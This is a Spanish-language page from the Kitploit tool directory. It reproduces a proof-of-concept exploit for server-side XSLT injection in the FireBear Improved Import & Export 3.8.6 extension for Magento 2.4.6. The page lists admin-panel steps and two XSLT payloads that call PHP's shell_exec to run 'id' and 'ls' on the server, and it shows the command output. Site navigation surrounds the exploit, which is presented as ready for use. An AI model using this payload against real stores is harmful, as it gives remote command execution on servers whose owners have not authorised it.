Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Magento-ver.-2.4.6 — Magento ver. 2.4.6 - XSLT Server Side Injection | Kitploit
Herramientas/GitHubGitHub/capture0x/magento-ver.-2.4.6
Vulnerability AnalysisExploitationWeb Application ExploitationPayload Development
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection

Ver Repositorio
4hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Título del exploit: FireBear Studio Improved Import & Export ver. 3.8.6 para Magento 2.4.6 - Inyección XSLT del lado del servidor

  • Fecha: 2023-11-17
  • Autor del exploit: tmrswrr
  • Página web del proveedor: FireBear Studio
  • Enlace del software: FireBear Studio Improved Import & Export
  • Versión: FireBear Improved Import & Export ver. 3.8.6
Imagen de Magento Imagen de Magento ## POC
  1. Ingrese con credenciales de administrador en esta URL: https://magento2demo.firebearstudio.com/

  2. Haga clic en SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. Seleccione Import File Type > XML > Import Source is File

  4. Suba cualquier archivo xml

  5. Haga clic en XSLT Configuration y escriba este payload:

    root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

root@kitploit:~
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
Descargar herramienta